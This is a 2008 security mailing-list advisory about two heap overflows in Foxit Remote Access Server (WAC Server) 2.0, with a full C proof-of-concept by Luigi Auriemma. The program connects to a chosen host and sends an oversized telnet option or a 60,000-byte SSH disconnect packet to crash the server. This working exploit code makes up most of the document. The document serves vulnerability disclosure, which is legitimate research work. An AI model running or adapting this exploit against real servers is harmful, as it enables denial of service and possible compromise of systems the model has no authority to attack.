
| Subject: | [NT] Foxit Remote Access Server Two Heap Overflows |
|---|---|
| Date: | 19 Feb 2008 14:52:54 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source. http://www.securiteam.com/mailinglist.html
- - - - - - - - -

Foxit Remote Access Server Two Heap Overflows
------------------------------------------------------------------------

SUMMARY

<http://www.foxitsoft.com/wac/server_intro.php> WAC is "a commercial SSH/telnet server for Windows". Two heap overflow vulnerabilities have been discovered in Foxit Remote Access Server.

DETAILS

Vulnerable Systems:
* Foxit Remote Access Server (WAC Server) version 2.0 Build 3503

Telnet option heap overflow
The WAC server is vulnerable to a heap overflow exploitable through the use of options longer than 260 bytes.
Note: this bug was wrongly reported by me as a crash and with a wrong server version one month ago.

SSH packet heap overflow
The server is also affected by another heap overflow, exploitable through large SSH packets; no deeper research has been performed on this vulnerability.
Exploit:
/* by Luigi Auriemma - http://aluigi.org/poc/wachof.zip */
/*
 * Proof-of-concept accompanying the advisory above.  It opens a single TCP
 * connection and sends one oversized message, either as a telnet option
 * subnegotiation (attack 1) or as a cleartext SSH2 packet (attack 2); the
 * advisory states that each triggers a heap overflow in the WAC server.
 * From a defender's point of view the relevant quantities are BOF1SZ and
 * BOF2SZ below: these are the lengths the advisory says the server copies
 * without bounding them.  The helpers after main() are generic byte-packing
 * and bounded-receive routines.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"          /* presumably supplies std_err() on Windows - not in this file */
#define close closesocket
#define sleep Sleep
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#define ONESEC 1
#endif
typedef uint8_t u8;
typedef uint16_t u16;
typedef uint32_t u32;
#define VER "0.1"
#define BUFFSZ 0xffff               /* size of the single heap receive/build buffer (65535 bytes) */
#define BOF1SZ 600                  /* telnet option body length; the advisory says >260 bytes overflows */
#define BOF2SZ 60000                /* length of the string carried in the SSH DISCONNECT payload */
#define SSH2_MSG_DISCONNECT 1       /* SSH2 message numbers as assigned by RFC 4253 */
#define SSH2_MSG_KEXINIT 20         /* declared but not used anywhere in this file */
int ssh_send(int sd, int type, u8 *buff, int len);
int str_recv(int sd, u8 *buff, int buffsz);
int tcp_recv(int sd, u8 *buff, int len);
int ssh_recv(int sd, u8 *buff);
int putsh(u8 *dst, u8 *str);
int putcc(u8 *data, int chr, int len);
int getxx(u8 *data, u32 *ret, int bits);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);
/*
 * Entry point.  argv[1] selects the attack (1 = telnet, 2 = SSH), argv[2] is
 * the host, argv[3] optionally overrides the default port.  Exits with 1 on
 * usage, resolution, allocation or connection errors (std_err/exit do not
 * close the socket or free buff; the process exit reclaims them).  On the
 * normal path everything is released at the quit: label.
 */
int main(int argc, char *argv[]) {
    struct sockaddr_in peer;
    int sd, attack;
    u16 port;
    u8 *buff, *p;
#ifdef WIN32
    WSADATA wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);    /* return value not checked */
#endif
    setbuf(stdout, NULL);   /* unbuffered stdout so progress lines appear before a hang */
    fputs("\n"
          "WAC Server <= 2.0 Build 3503 double heap overflow "VER"\n"
          "by Luigi Auriemma\n"
          "e-mail: aluigi@autistici.org\n"
          "web: aluigi.org\n"
          "\n", stdout);
    if(argc < 3) {
        printf("\n"
               "Usage: %s <attack> <host> [port]\n"
               "\n"
               "Attack:\n"
               " 1 = telnet option heap overflow (default port 23)\n"
               " 2 = SSH packet heap overflow (default port 22)\n"
               "\n", argv[0]);
        exit(1);
    }
    attack = atoi(argv[1]);     /* atoi: non-numeric input silently becomes 0 and hits default */
    switch(attack) {
        case 1: port = 23; break;
        case 2: port = 22; break;
        default: {
            printf("\nError: wrong attack number (%s)\n", argv[1]);
            exit(1);
        } break;
    }
    if(argc > 3) port = atoi(argv[3]);
    peer.sin_addr.s_addr = resolv(argv[2]);     /* exits on resolution failure */
    peer.sin_port = htons(port);
    peer.sin_family = AF_INET;
    printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));
    buff = malloc(BUFFSZ);
    if(!buff) std_err();
    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer)) < 0) std_err();
    if(attack == 1) {
        /* Wait for the server's initial telnet negotiation.  NOTE: sizeof(buff) is
         * the size of the pointer, not BUFFSZ, so only 4 or 8 bytes are consumed. */
        if((timeout(sd, 3) < 0) || (recv(sd, buff, sizeof(buff), 0) <= 0)) goto quit;
        printf("- send set option\n");
        /* One telnet subnegotiation: IAC SB <option> <BOF1SZ bytes> IAC SE. */
        p = buff;
        *p++ = 0xff; // IAC
        *p++ = 0xfa; // SB: begin subnegotiation
        *p++ = 0x00; // option id 0
        p += putcc(p, 'A', BOF1SZ);     /* option body; this is the length the server must bound */
        *p++ = 0xff; // IAC
        *p++ = 0xf0; // SE: end subnegotiation (earlier comment here said "set option")
        if(send(sd, buff, p - buff, 0) < 0) goto quit;
        /* No reply within 3 s (or a closed socket) is taken as the crash indicator;
         * sizeof(buff) has the same pointer-size issue as above. */
        if((timeout(sd, 3) < 0) || (recv(sd, buff, sizeof(buff), 0) <= 0)) {
            printf("- server should have been crashed\n");
        }
    } else if(attack == 2) {
        /* Read the server identification line, answer with our own, then send a
         * DISCONNECT packet before any key exchange, i.e. still in cleartext. */
        if(str_recv(sd, buff, BUFFSZ) < 0) goto quit;
        printf("- received banner: %s\n", buff);
#define SSHBANNER "SSH-2.0-OpenSSH_4.7p1\r\n"
        if(send(sd, SSHBANNER, sizeof(SSHBANNER) - 1, 0) < 0) goto quit;   /* -1: no terminating NUL on the wire */
        /* SSH_MSG_DISCONNECT payload: uint32 reason, string description, string language tag. */
        p = buff;
        p += putxx(p, 0, 32); // reason
        p += putxx(p, BOF2SZ, 32); // string size
        p += putcc(p, 'A', BOF2SZ); // string body - the "big SSH packet" of the advisory
        p += putsh(p, "");  // empty language tag
        if(ssh_send(sd, SSH2_MSG_DISCONNECT, buff, p - buff) < 0) goto quit;
        if(ssh_recv(sd, buff) < 0) goto quit;   /* any reply is read and reported, not parsed */
    }
quit:
    close(sd);
    free(buff);
    printf("- done\n");
    return(0);
}
/*
 * Send one SSH2 binary packet in cleartext (no MAC, no cipher):
 *   uint32 packet_length = 1 (padding_length) + 1 (type) + len + rem
 *   byte   padding_length = rem
 *   byte   type
 *   buff[len], then rem zero bytes
 * rem is chosen so that 6 + len + rem is a multiple of 16; it can be 0 here,
 * whereas RFC 4253 asks for at least 4 bytes of padding.  Returns 0, or -1 if
 * any send() transfers fewer bytes than requested (partial sends count as
 * failure).  tmp[16] holds the 6-byte header and then up to 15 zero bytes.
 */
int ssh_send(int sd, int type, u8 *buff, int len) {
    int rem;
    u8 tmp[16];
    rem = (((len + 6) + 15) & (~15)) - (len + 6);
    printf("- %d bytes sent (%d + %d)\n", 6 + len + rem, len, rem);
    putxx(tmp, 1 + 1 + len + rem, 32);
    tmp[4] = rem;
    tmp[5] = type;
    if(send(sd, tmp, 6, 0) != 6) return(-1);
    if(len) {
        if(send(sd, buff, len, 0) != len) return(-1);
    }
    if(rem) {
        memset(tmp, 0, rem);
        if(send(sd, tmp, rem, 0) != rem) return(-1);
    }
    return(0);
}
/*
 * Receive one line, byte by byte, into buff (at most buffsz-1 bytes plus NUL).
 * Stops at '\n'; a '\r' is overwritten with NUL so the result is a plain C
 * string.  Each byte waits up to 3 s (see timeout()).  Returns 0 on success,
 * -1 on timeout or a closed/failed socket; buff is only NUL-terminated on
 * the success path.
 */
int str_recv(int sd, u8 *buff, int buffsz) {
    int len, t;
    buffsz--;
    for(len = 0; len < buffsz; len++) {
        if(timeout(sd, 3) < 0) return(-1);
        t = recv(sd, buff + len, 1, 0);
        if(t <= 0) return(-1);
        if(buff[len] == '\n') break;
        if(buff[len] == '\r') buff[len] = 0;
    }
    buff[len] = 0;
    return(0);
}
/*
 * Receive exactly len bytes into buff, looping over short reads with a 3 s
 * wait before each recv().  Returns 0 when all bytes arrived, -1 on timeout
 * or a closed/failed socket.
 */
int tcp_recv(int sd, u8 *buff, int len) {
    int t;
    u8 *p;
    for(p = buff; len; p += t, len -= t) {
        if(timeout(sd, 3) < 0) return(-1);
        t = recv(sd, p, len, 0);
        if(t <= 0) return(-1);
    }
    return(0);
}
/*
 * Read one raw SSH2 packet: a 4-byte big-endian packet_length followed by
 * that many bytes (padding_length, type, payload and padding, all left as
 * received).  A packet_length larger than BUFFSZ is rejected by returning 0
 * without consuming the body, so the stream is left mid-packet.  Returns the
 * body length, 0 for oversized, -1 on receive failure.  (len is printed
 * with %d although it is u32.)
 */
int ssh_recv(int sd, u8 *buff) {
    u32 len;
    u8 tmp[4];
    if(tcp_recv(sd, tmp, 4) < 0) return(-1);
    getxx(tmp, &len, 32);
    if(len > BUFFSZ) return(0);
    if(tcp_recv(sd, buff, len) < 0) return(-1);
    printf("- %d bytes received\n", len);
    return(len);
}
/*
 * Append an SSH "string" (4-byte big-endian length + bytes, no NUL) to dst.
 * Returns the number of bytes written.  dst is not bounds-checked; the
 * caller must have room for 4 + strlen(str).
 */
int putsh(u8 *dst, u8 *str) {
    int len;
    len = strlen(str);
    putxx(dst, len, 32);
    memcpy(dst + 4, str, len);
    return(4 + len);
}
/* Fill len bytes of data with chr and return len (memset wrapper for pointer-advancing callers). */
int putcc(u8 *data, int chr, int len) {
    memset(data, chr, len);
    return(len);
}
/*
 * Decode a big-endian unsigned integer of bits/8 bytes from data into *ret;
 * returns the number of bytes consumed.  NOTE: data[i] is promoted to int
 * before the shift, so a top byte >= 0x80 shifted by 24 is undefined in C;
 * an explicit (u32) cast on data[i] would make it well defined.
 */
int getxx(u8 *data, u32 *ret, int bits) {
    u32 num;
    int i, bytes;
    bytes = bits >> 3;
    for(num = i = 0; i < bytes; i++) {
        num |= (data[i] << ((bytes - 1 - i) << 3));
    }
    *ret = num;
    return(bytes);
}
/* Encode num as a big-endian unsigned integer of bits/8 bytes into data; returns bytes written. */
int putxx(u8 *data, u32 num, int bits) {
    int i, bytes;
    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff;
    }
    return(bytes);
}
/*
 * Block until sock is readable or secs seconds elapse.  Returns 0 when
 * readable, -1 on timeout or select() error.  Uses select()/FD_SET, so on
 * POSIX a descriptor >= FD_SETSIZE would be out of range (not a concern for
 * the single socket used here).
 */
int timeout(int sock, int secs) {
    struct timeval tout;
    fd_set fd_read;
    tout.tv_sec = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout) <= 0) return(-1);
    return(0);
}
/*
 * Resolve host to a network-order IPv4 address: dotted-quad via inet_addr,
 * otherwise the first address from gethostbyname().  Exits with 1 if the
 * name does not resolve.  The *(u32 *)h_addr read assumes an AF_INET result
 * and suitable alignment; inet_addr's INADDR_NONE sentinel also means
 * "255.255.255.255" cannot be given numerically.
 */
u32 resolv(char *host) {
    struct hostent *hp;
    u32 host_ip;
    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}
#ifndef WIN32
/* Print the last errno with a leading "Error" prefix and exit with 1 (non-Windows only). */
void std_err(void) {
    perror("\nError");
    exit(1);
}
#endif
ADDITIONAL INFORMATION The information has been provided by <mailto:aluigi@autistici.org> Luigi Auriemma. The original article can be found at: <http://aluigi.altervista.org/adv/wachof-adv.txt> http://aluigi.altervista.org/adv/wachof-adv.txt ======================================== This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.